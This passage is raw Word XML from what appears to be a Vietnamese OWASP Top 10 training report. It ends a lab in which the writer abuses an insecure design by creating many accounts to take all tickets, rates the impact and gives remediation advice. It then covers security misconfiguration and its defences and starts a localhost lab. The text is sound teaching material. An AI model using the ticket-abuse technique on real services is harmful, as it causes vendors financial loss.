        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00004C79">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00004C79">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4747E785" wp14:editId="2C89BFAC">
            <wp:extent cx="6115050" cy="2534920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="545970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70537" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2534920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00004C79">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E12343" w14:textId="77777777" w:rsidR="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="00004C79">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B8AE19B" wp14:editId="59FDD305">
            <wp:extent cx="6115050" cy="2204085"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="709146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46939" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId69"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2204085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C128CA5" w14:textId="65AFC596" w:rsidR="009D0400" w:rsidRPr="00E9180E" w:rsidRDefault="008F6347" w:rsidP="009D0400">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00211DB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="009D0400">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="008F6347">
        <w:t xml:space="preserve">Đến đây </w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:t xml:space="preserve">là </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="008F6347">
        <w:t>đã lấy hết toàn bộ số lượn</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="008F6347">
        <w:t xml:space="preserve"> vé, và bắt đầu nhập mã vé và nhấn Watch thì thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAA5E79" w14:textId="77777777" w:rsidR="009D0400" w:rsidRPr="00CF205D" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="009E5B46">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79954D3D" wp14:editId="6FC128F9">
            <wp:extent cx="6115050" cy="2773680"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1896317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17501" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId70"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2773680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BE1DAB" w14:textId="4AAE1FA3" w:rsidR="009D0400" w:rsidRPr="001F070A" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidR="001F070A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F6347" w:rsidRPr="008F6347">
        <w:t>High (cao) vì l</w:t>
      </w:r>
      <w:r w:rsidR="001F070A" w:rsidRPr="008F6347">
        <w:t>ỗ hổng này cho phép người dùng lạm dụng thiết kế không an toàn để tạo nhiều tài khoản, lấy toàn bộ vé, gây thiệt hại về lợi nhuận và mất quyền kiểm soát số lượng vé phân phối.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F84DC72" w14:textId="77777777" w:rsidR="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4696F8D4" w14:textId="7944327F" w:rsidR="009D0400" w:rsidRPr="00211DB1" w:rsidRDefault="009D0400" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Xây dựng từ đầu với an ninh:</w:t>
      </w:r>
      <w:r w:rsidRPr="00211DB1">
        <w:t xml:space="preserve"> Thiết kế hệ thống từ đầu với các nguyên tắc an ninh (tập trung vào phần Sec theo DevSecOps) để đảm bảo tính bảo mật được tích hợp ngay từ khi bắt đầu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D4B43C" w14:textId="1298F9D8" w:rsidR="009D0400" w:rsidRPr="00211DB1" w:rsidRDefault="009D0400" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kiểm tra đánh giá rủi ro:</w:t>
      </w:r>
      <w:r w:rsidRPr="00211DB1">
        <w:t xml:space="preserve"> Tiến hành kiểm tra đánh giá rủi ro đầy đủ để xác định các lỗ hổng tiềm ẩn và điều chỉnh thiết kế để giảm thiểu rủi ro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031325C3" w14:textId="7C6B5F0E" w:rsidR="009D0400" w:rsidRPr="00211DB1" w:rsidRDefault="009D0400" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sử dụng các mẫu thiết kế an toàn:</w:t>
      </w:r>
      <w:r w:rsidRPr="00211DB1">
        <w:t xml:space="preserve"> Sử dụng các mẫu thiết kế được chứng minh là an toàn để giảm thiểu khả năng xuất hiện lỗ hổng trong hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109C53A7" w14:textId="050AE56D" w:rsidR="009D0400" w:rsidRPr="00211DB1" w:rsidRDefault="009D0400" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thực hiện kiểm tra an ninh định kỳ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00211DB1">
        <w:t xml:space="preserve"> Thực hiện kiểm tra an ninh định kỳ để phát hiện và khắc phục các lỗ hổng trong thiết kế hệ thống, đảm bảo tính bảo mật liên tục.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EA49AF" w14:textId="21FAC0C5" w:rsidR="007C62EC" w:rsidRPr="00211DB1" w:rsidRDefault="009D0400" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cập nhật và tuân thủ chuẩn an ninh:</w:t>
      </w:r>
      <w:r w:rsidRPr="00211DB1">
        <w:t xml:space="preserve"> Theo dõi các cập nhật và tuân thủ các chuẩn an ninh hiện hành, cùng với đó là đào tạo nhân viên về các nguy cơ và biện pháp phòng ngừa lỗ hổng trong thiết kế, giúp họ nhận biết và tránh các vấn đề liên quan đến an ninh để đảm bảo rằng hệ thống luôn đáp ứng các yêu cầu an toàn mới nhất.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37388771" w14:textId="77777777" w:rsidR="00B528F8" w:rsidRDefault="00B528F8">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CF33E4" w14:textId="7A94BD8B" w:rsidR="00151DDF" w:rsidRPr="00955E98" w:rsidRDefault="00151DDF" w:rsidP="00151DDF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc182909846"/>
      <w:r w:rsidRPr="00955E98">
        <w:lastRenderedPageBreak/>
        <w:t>A05:2021 – Security Misconfiguration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="564F30E8" w14:textId="52CB703E" w:rsidR="00151DDF" w:rsidRDefault="00151DDF" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc182909847"/>
      <w:r w:rsidRPr="00151DDF">
        <w:t>Mô tả lỗ hổng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="529D9FE3" w14:textId="7890C9BA" w:rsidR="005D0569" w:rsidRPr="008F6347" w:rsidRDefault="00211DB1" w:rsidP="008F6347">
      <w:r w:rsidRPr="008F6347">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="008F6347">
        <w:t>Ứng dụng có thể gặp phải vấn đề cấu hình bảo mật sai trong một số tr</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="008F6347">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="008F6347">
        <w:t>ờng hợp nh</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="008F6347">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="008F6347">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390F56CB" w14:textId="1F9BEC35" w:rsidR="005D0569" w:rsidRPr="00211DB1" w:rsidRDefault="005D0569" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DB1">
        <w:t>Các tính năng không cần thiết đ</w:t>
      </w:r>
      <w:r w:rsidRPr="00211DB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="00211DB1">
        <w:t>ợc bật hoặc cài đặt (ví dụ nh</w:t>
      </w:r>
      <w:r w:rsidRPr="00211DB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="00211DB1">
        <w:t xml:space="preserve"> các cổng, dịch vụ, trang, tài khoản, hoặc quyền không cần thiết)</w:t>
      </w:r>
      <w:r w:rsidR="00211DB1" w:rsidRPr="00211DB1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0081FB29" w14:textId="61A6BC46" w:rsidR="005D0569" w:rsidRPr="00211DB1" w:rsidRDefault="005D0569" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DB1">
        <w:t>Tài khoản mặc định và mật khẩu đ</w:t>
      </w:r>
      <w:r w:rsidRPr="00211DB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="00211DB1">
        <w:t xml:space="preserve">ợc bật và không thay đổi. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C09096" w14:textId="27F9F47E" w:rsidR="005D0569" w:rsidRPr="00211DB1" w:rsidRDefault="005D0569" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DB1">
        <w:t>Xử lý thông báo lỗi quá mức cho ng</w:t>
      </w:r>
      <w:r w:rsidRPr="00211DB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="00211DB1">
        <w:t>ời dùng</w:t>
      </w:r>
      <w:r w:rsidR="00211DB1" w:rsidRPr="00211DB1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F50355" w14:textId="793C2A97" w:rsidR="005D0569" w:rsidRPr="00211DB1" w:rsidRDefault="005D0569" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DB1">
        <w:t>Đối với các hệ thống đ</w:t>
      </w:r>
      <w:r w:rsidRPr="00211DB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="00211DB1">
        <w:t>ợc nâng cấp, tính năng bảo mật mới nhất bị vô hiệu hoá hoặc không đ</w:t>
      </w:r>
      <w:r w:rsidRPr="00211DB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="00211DB1">
        <w:t xml:space="preserve">ợc cấu hình an toàn. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37141D38" w14:textId="31B21012" w:rsidR="00151DDF" w:rsidRPr="00211DB1" w:rsidRDefault="005D0569" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DB1">
        <w:t>Phần mềm bị lỗi thời hoặc có lỗ hổng ( xem thêm A06:2021-Vulnerable and Outdated Components)</w:t>
      </w:r>
      <w:r w:rsidR="00211DB1" w:rsidRPr="00211DB1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F773A3" w14:textId="5CB905EA" w:rsidR="004B51F7" w:rsidRDefault="004B51F7" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc182909848"/>
      <w:r>
        <w:t xml:space="preserve">Biện pháp </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26">
        <w:t>ngăn chặn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="01361860" w14:textId="59469FE4" w:rsidR="004B51F7" w:rsidRPr="008F6347" w:rsidRDefault="004B51F7" w:rsidP="008F6347">
      <w:r w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- Sử dụng quy trình làm cứng lặp lại để triển khai môi trường khác được bảo mật đúng cách một cách nhanh chóng và dễ dàng. </w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:t>Các môi trường phát triển, QA, và sản xuất nên được cấu hình giống nhau, nhưng sử dụng thông tin đăng nhập khác nhau cho mỗi môi trường. Tự động hóa quy trình này để giảm thiểu nỗ lực cần thiết để thiết lập môi trường bảo mật mới.</w:t>
      </w:r>
      <w:r w:rsidR="00D01C11" w:rsidRPr="008F6347">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:t xml:space="preserve"> Trong một công ty phát triển phần mềm, sử dụng các script tự động để triển khai cấu hình bảo mật tiêu chuẩn cho tất cả các môi trường, từ phát triển đến sản xuất, giúp giảm nguy cơ cấu hình sai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A3042F" w14:textId="65250BE8" w:rsidR="004B51F7" w:rsidRPr="008F6347" w:rsidRDefault="00D01C11" w:rsidP="008F6347">
      <w:r w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="004B51F7" w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sử dụng nền tảng tối thiểu</w:t>
      </w:r>
      <w:r w:rsidR="00787EED" w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> với các </w:t>
      </w:r>
      <w:r w:rsidR="004B51F7" w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tính năng cần thiết, loại bỏ hoặc không cài đặt những tính năng và khung phần mềm không sử dụng.</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B51F7" w:rsidRPr="008F6347">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidR="004B51F7" w:rsidRPr="008F6347">
        <w:t xml:space="preserve"> Một máy chủ web chỉ nên cài đặt các mô-đun cần thiết cho hoạt động của ứng dụng web và loại bỏ các mô-đun không cần thiết để giảm bề mặt tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:t xml:space="preserve"> (attack surface)</w:t>
      </w:r>
      <w:r w:rsidR="004B51F7" w:rsidRPr="008F6347">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428EBDAA" w14:textId="151FA8F4" w:rsidR="004B51F7" w:rsidRPr="008F6347" w:rsidRDefault="00D01C11" w:rsidP="008F6347">
      <w:r w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="004B51F7" w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cập nhật và đánh giá cấu hình</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> định kỳ </w:t>
      </w:r>
      <w:r w:rsidR="004B51F7" w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">theo các ghi chú bảo mật, cập nhật, và bản vá như một phần của quy trình quản lý bản vá. </w:t>
      </w:r>
      <w:r w:rsidR="004B51F7" w:rsidRPr="008F6347">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidR="004B51F7" w:rsidRPr="008F6347">
        <w:t xml:space="preserve"> Tại một tổ chức tài chính, việc </w:t>
      </w:r>
      <w:r w:rsidR="004B51F7" w:rsidRPr="008F6347">
        <w:lastRenderedPageBreak/>
        <w:t>kiểm tra và cập nhật quyền truy cập đám mây thường xuyên giúp ngăn ngừa việc dữ liệu khách hàng bị lộ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEF1769" w14:textId="53DD3F53" w:rsidR="004B51F7" w:rsidRPr="008F6347" w:rsidRDefault="00D01C11" w:rsidP="008F6347">
      <w:r w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="004B51F7" w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sử dụng kiến trúc phân đoạn để cung cấp sự tách biệt hiệu quả và an toàn giữa các thành phần hoặc khách hàng, với phân đoạn, containerization, hoặc các nhóm bảo mật đám mây.</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B51F7" w:rsidRPr="008F6347">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidR="004B51F7" w:rsidRPr="008F6347">
        <w:t xml:space="preserve"> Sử dụng các nhóm bảo mật đám mây (cloud security groups) để đảm bảo rằng chỉ những dịch vụ cần thiết mới được kết nối với nhau, giảm thiểu nguy cơ di chuyển ngang trong trường hợp một dịch vụ bị tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E53F88" w14:textId="20C19A23" w:rsidR="004B51F7" w:rsidRPr="008F6347" w:rsidRDefault="00D01C11" w:rsidP="008F6347">
      <w:r w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="004B51F7" w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gửi các chỉ thị bảo mật đến client:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B51F7" w:rsidRPr="008F6347">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidR="004B51F7" w:rsidRPr="008F6347">
        <w:t xml:space="preserve"> Thêm các Security Headers như Content Security Policy (CSP) để ngăn chặn các cuộc tấn công XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:t>, giúp tăng cường bảo mật cho các ứng dụng web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02303D2A" w14:textId="4F2F68EE" w:rsidR="004B51F7" w:rsidRPr="008F6347" w:rsidRDefault="00D01C11" w:rsidP="008F6347">
      <w:r w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="004B51F7" w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tạo quy trình tự động để xác minh tính hiệu quả của cấu hình và cài đặt trong tất cả các môi trường.</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B51F7" w:rsidRPr="008F6347">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidR="004B51F7" w:rsidRPr="008F6347">
        <w:t xml:space="preserve"> Sử dụng các công cụ kiểm tra cấu hình tự động để xác minh rằng các cấu hình bảo mật được áp dụng đúng cách trong môi trường sản xuất.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B1C2EA" w14:textId="77777777" w:rsidR="00151DDF" w:rsidRPr="00151DDF" w:rsidRDefault="00151DDF" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc182909849"/>
      <w:r w:rsidRPr="00151DDF">
        <w:t>Kịch bản tấn công thực hành</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="24F8782B" w14:textId="64F25183" w:rsidR="00031203" w:rsidRDefault="00031203" w:rsidP="00031203">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc182909850"/>
      <w:r w:rsidRPr="00031203">
        <w:t>Bài thực hành – Lab 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="51482E7C" w14:textId="4B60B44A" w:rsidR="004E0865" w:rsidRPr="004E0865" w:rsidRDefault="004E0865" w:rsidP="004E0865">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0865">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Truy cập vào: </w:t>
      </w:r>
      <w:hyperlink r:id="rId71" w:history="1">
        <w:r w:rsidRPr="004E0865">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://localhost:8000/sec_mis_lab</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2ACC19E2" w14:textId="51ECB874" w:rsidR="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tiêu đề: </w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:t>Security Misconfiguration</w:t>
      </w:r>
      <w:r w:rsidR="004E0865">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A626EC0" w14:textId="4583D489" w:rsidR="009D0400" w:rsidRPr="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
